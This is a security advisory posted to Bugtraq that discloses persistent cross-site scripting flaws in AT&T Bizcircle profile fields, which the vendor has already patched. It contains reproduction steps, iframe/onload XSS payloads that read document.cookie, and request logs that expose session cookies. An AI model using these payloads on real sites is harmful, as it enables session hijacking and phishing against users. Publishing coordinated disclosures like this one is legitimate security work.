lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 11 Jul 2018 15:10:09 +0200
From: Vulnerability Lab <research@...nerability-lab.com>
To: bugtraq@...urityfocus.com, bugs@...uritytracker.com
Subject: AT&T Bizcircle - Persistent Profile Cross Site Scripting
 Vulnerabilities

Document Title:
===============
AT&T Bizcircle - Persistent Profile Cross Site Scripting Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2108

AT&T Reference ID: 1502971499862

Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2018/07/05/att-corporation-lab-uncovers-new-details-about-bizcircle-vulnerabilities


Release Date:
=============
2018-07-05


Vulnerability Laboratory ID (VL-ID):
====================================
2108


Common Vulnerability Scoring System:
====================================
4.6


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
AT&T Inc. is an American multinational conglomerate holding company
headquartered at Whitacre Tower in downtown Dallas, Texas.
AT&T is the world's largest telecommunications company. AT&T is also the
second largest provider of mobile telephone services
and the largest provider of fixed telephone services in the United
States. The company provides broadband subscription
television services through Uverse Tv and DirecTV satellite television.
Combined with AT&T's legacy U-verse service, this
also makes AT&T the largest paid television operator. AT&T is the
second-largest company in Texas, behind ExxonMobil. AT&T is
the 11th largest company in the world. AT&T is the largest
telecommunications company in the world by revenue. As of 2017, it
is also the 21st-largest mobile telecom operator in the world, with
138.8 million mobile customers. AT&T was ranked at #4 on
the 2017 rankings of the world's most valuable brands published by Brand
Finance. Since 2012, AT&T has invested more in the
United States than any other public company.

(Copy of the Homepage: https://en.wikipedia.org/wiki/AT%26T )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent cross site vulnerabilities in the AT&T Bizcircle online
service web-application.


Vulnerability Disclosure Timeline:
==================================
2017-08-16: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2017-08-17: Vendor Notification (AT&T Security Department)
2017-08-25: Vendor Response/Feedback (AT&T Security Department)
2017-11-10: Vendor Fix/Patch (AT&T Service Developer Team)
2018-02-10: Security Acknowledgements  (AT&T Security Department)
2018-07-05: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
AT&T Inc
Product: BizCircle - Online Service (Web-Application) 2017 Q3 - Q4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Bug Bounty Program


Technical Details & Description:
================================
An input validation issue and multiple cross site vulnerabilities has
been discovered in the official AT&T Bizcircle online service
web-application.
The persistent cross site issue allows remote attackers to inject own
malicious script codes with persistent attack vector to compromise
the frontend or backend of the affected web-application.

The vulnerabilities are located in the `/members/att1759500603/profile/`
section of the content management system. Attackers are able to inject
own malicious script code to the `firstname, lastname, name & groups`
parameters of the `profile` section on update. An attacker could register
and then change the firstname and lastname or shared group to a payload
that is insecure saved into the database management system. The injected
payload provokes a persistent execution of the injected code in the
backend or frontend. Session hijacking, persistent phishing and
backend/frontend exploitation is possible.

The security risk of the persistent xss vulnerabilities are estimated as
medium with a cvss (common vulnerability scoring system) count of 4.6.
Exploitation of the persistent web vulnerability requires a low
privileged web-application user account and only low user interaction.
Successful exploitation of the vulnerability results in persistent
phishing, session hijacking, persistent external redirect
to malicious sources and client-side manipulation of affected or
connected web module context.

Vulnerable Parameter(s):
[+] firstname
[+] lastname
[+] name
[+] groups

Affected Section(s):
[+] Frontend
[+] Backend


Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers with low
privileged web-application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the
instruction and information below to continue.


Manual steps to reproduce ...
1. Register to the att bizcirlce web-application by usage of the
register function
2. Login to your account and open the profile section
Note: Start a http session tamper in the browser to preview or record
3. Include the payload to the vulnerable marked input fields (firstname,
lastname, name & groups)
4. Save the profile entries by submit of the post method request
5. The execute occurs in the frontend profile section (local), the
groups (shared) and the backend (lists mods/admins the registered user data)
6. Successful reproduce of the persistent cross site vulnerability!


Member ID: att1759500603


PoC: Payload
"><iframe>%20%20"><iframe src=evil.source onload=alert(document.cookie)>%20
"><iframe>%20%20"><iframe src=evil.source onload=alert(document.domain)>%20


PoC: Exploitation (Demo)
https://bizcircle.att.com/members/att1759500603/profile/edit/group/1/[Payload
Execution]


--- PoC Session Logs ---
Status: 200[OK]
GET https://bizcircle.att.com/members/att1759500603/profile/edit/group/1/
Mime Type[text/html]
   Request Header:
      Host[bizcircle.att.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:54.0)
Gecko/20100101 Firefox/54.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Referer[https://bizcircle.att.com/members/att1759500603/]
      Cookie[PHPSESSID=l18mlg2dueco0q3h6kb131eub7;
AMCV_55633F7A534535110A490D44%40AdobeOrg=209651070
1%7CMCIDTS%7C17396%7CMCMID%7C26100431646396483062447545331633367848%7CMCAAMLH-1503573649%7C6%7CMCAAMB-
1503573649%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1502976049s%7CNONE%7CMCAID%7CNONE%7CMCSYNCSOP%7C411-174
03%7CvVersion%7C2.0.0;
mbox=session#1502968849133-685067#1502970919|PC#1502968849133-685067.26_19#1504178659;

AMCVS_55633F7A534535110A490D44%40AdobeOrg=1;
_ga=GA1.2.774089946.1502968850; _gid=GA1.2.1647846308.1502968850;
s_cc=true; bp-activity-oldestpage=1;
aam_uuid=26195646366965627042419912699465776394; Successful
Registration=true;
TLTSID=DFFB796CF9727EB3DAD892F1CE4732DB;
fsr.s={"v2":1,"v1":1,"rid":"d036702-53861434-b5e4-2910-b41f2",
"cp":{"ufix":"no","ug":"n","platform":"mSite","WLS_TSR":"no"},"to":4.7,"pv":6,"f":1502968971713};
wordpress_logged_in_cae26c4a20b3aee9c355ac89848c9a6c=att1759500603%7C1503141687%7C5r0gGlSD0k4TLZ8DdczeF
GgpYJrrbeqwy9p8pvslaMr%7Cab6915c095b9e9a27373469d6f4cae49510879dab933281d16868d1cf4bd524a;
fsr.a=1502969052593; _gat=1]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   Response Header:
      Server[Apache]
      X-Frame-Options[SAMEORIGIN]
      Cache-Control[no-cache, must-revalidate, max-age=0]
      X-UA-Compatible[IE=edge]
      Content-Type[text/html; charset=UTF-8]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      Content-Length[19399]
      Connection[keep-alive]

Status: 200[OK]
GET
https://bizcircle.att.com/members/att1759500603/profile/edit/group/1/evil.source/

Mime Type[text/html]
   Request Header:
      Host[bizcircle.att.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:54.0)
Gecko/20100101 Firefox/54.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]

Referer[https://bizcircle.att.com/members/att1759500603/profile/edit/group/1/]
      Cookie[PHPSESSID=l18mlg2dueco0q3h6kb131eub7;
AMCV_55633F7A534535110A490D44%40AdobeOrg=2096510701
%7CMCIDTS%7C17396%7CMCMID%7C26100431646396483062447545331633367848%7CMCAAMLH-1503573649%7C6%7CMCAAMB-150
3573649%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1502976049s%7CNONE%7CMCAID%7CNONE%7CMCSYNCSOP%7C411-17403%7
CvVersion%7C2.0.0;
mbox=session#1502968849133-685067#1502970967|PC#1502968849133-685067.26_19#1504178707;

AMCVS_55633F7A534535110A490D44%40AdobeOrg=1;
_ga=GA1.2.774089946.1502968850; _gid=GA1.2.1647846308.1502968850;
s_cc=true; bp-activity-oldestpage=1;
aam_uuid=26195646366965627042419912699465776394;
Successful Registration=true; TLTSID=DFFB796CF9727EB3DAD892F1CE4732DB;
fsr.s={"v2":1,"v1":1,"rid":"d036702-53861434-b5e4-2910-b41f2",
"cp":{"ufix":"no","ug":"n","platform":"mSite","WLS_TSR":"no"},"to":4.5,"pv":6,"f":1502969105924};
wordpress_logged_in_cae26c4a20b3aee9c355ac89848c9a6c=att1759500603%7C1503141687%7C5r0gGlSD0k4TLZ8Ddc
zeFGgpYJrrbeqwy9p8pvslaMr%7Cab6915c095b9e9a27373469d6f4cae49510879dab933281d16868d1cf4bd524a;
_gat=1]
      Connection[keep-alive]
   Response Header:
      Server[Apache]
      X-Frame-Options[SAMEORIGIN]
      Cache-Control[no-cache, must-revalidate, max-age=0]
      X-UA-Compatible[IE=edge]
      Content-Type[text/html; charset=UTF-8]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
     Content-Length[19404]
      Connection[keep-alive]

Status: 200[OK]
GET
https://bizcircle.att.com/members/att1759500603/profile/edit/group/1/evil.source/

Mime Type[text/html]
   Request Header:
      Host[bizcircle.att.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:54.0)
Gecko/20100101 Firefox/54.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]

Referer[https://bizcircle.att.com/members/att1759500603/profile/edit/group/1/]
      Cookie[PHPSESSID=l18mlg2dueco0q3h6kb131eub7;
AMCV_55633F7A534535110A490D44%40AdobeOrg=2096510701%7CM
CIDTS%7C17396%7CMCMID%7C26100431646396483062447545331633367848%7CMCAAMLH-1503573649%7C6%7CMCAAMB-1503573649
%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1502976049s%7CNONE%7CMCAID%7CNONE%7CMCSYNCSOP%7C411-17403%7CvVersion%7C2.0.0;

mbox=session#1502968849133-685067#1502970967|PC#1502968849133-685067.26_19#1504178707;
AMCVS_55633F7A534535110
A490D44%40AdobeOrg=1; _ga=GA1.2.774089946.1502968850;
_gid=GA1.2.1647846308.1502968850;
s_cc=true; bp-activity-oldestpage=1;
aam_uuid=26195646366965627042419912699465776394;
Successful Registration=true; TLTSID=DFFB796CF9727EB3DAD892F1CE4732DB;
fsr.s={"v2":1,"v1":1,"rid":"d036702-53861434-b5e4-2910-b41f2",
"cp":{"ufix":"no","ug":"n","platform":"mSite","WLS_TSR":"no"},"to":4.5,"pv":6,"f":1502969105924};
wordpress_logged_in_cae26c4a20b3aee9c355ac89848c9a6c=att1759500603%7C1503141687%7C5r0gGlSD0k4TLZ8DdczeF
GgpYJrrbeqwy9p8pvslaMr%7Cab6915c095b9e9a27373469d6f4cae49510879dab933281d16868d1cf4bd524a;
_gat=1]
      Connection[keep-alive]
   Response Header:
      Server[Apache]
      X-Frame-Options[SAMEORIGIN]
      Cache-Control[no-cache, must-revalidate, max-age=0]
      X-UA-Compatible[IE=edge]
      Content-Type[text/html; charset=UTF-8]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      Content-Length[19404]
      Connection[keep-alive]


Reference(s):
https://bizcircle.att.com/
https://bizcircle.att.com/members/
https://bizcircle.att.com/members/att1759500603/
https://bizcircle.att.com/members/att1759500603/profile/
https://bizcircle.att.com/members/att1759500603/profile/edit/
https://bizcircle.att.com/members/att1759500603/profile/edit/group/
https://bizcircle.att.com/members/att1759500603/profile/edit/group/1/


Solution - Fix & Patch:
=======================
The vulnerability has been patched by the at&t developer team of the biz
circle team. The issue was part of the official bug bounty program.


Security Risk:
==============
The security risk of the persistent cross site vulnerabilities in the
web-application are estimated as medium (CVSS 4.6).


Credits & Authors:
==================
Benjamin K.M. [Vulnerability Laboratory Core Research Team] -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or
implied, including the warranties of merchantability and capability for
a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any
case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability Labs
or its
suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability mainly for
incidental
or consequential damages so the foregoing limitation may not apply. We
do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need
for criminal activities or membership requests. We do not publish
advisories
or vulnerabilities of religious-, militant- and racist-
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails,
phone numbers, conversations or anything else to journalists,
investigative authorities or private individuals.

Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					-
www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php 	-
vulnerability-lab.com/list-of-bug-bounty-programs.php 	-
vulnerability-lab.com/register.php
Feeds:	    vulnerability-lab.com/rss/rss.php 	-
vulnerability-lab.com/rss/rss_upcoming.php 			-
vulnerability-lab.com/rss/rss_news.php
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				-
youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this
file, resources or information requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other media, are
reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is
trademark
of vulnerability-lab team & the specific authors or managers. To record,
list, modify, use or edit our material contact (admin@) to get an ask
permission.

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ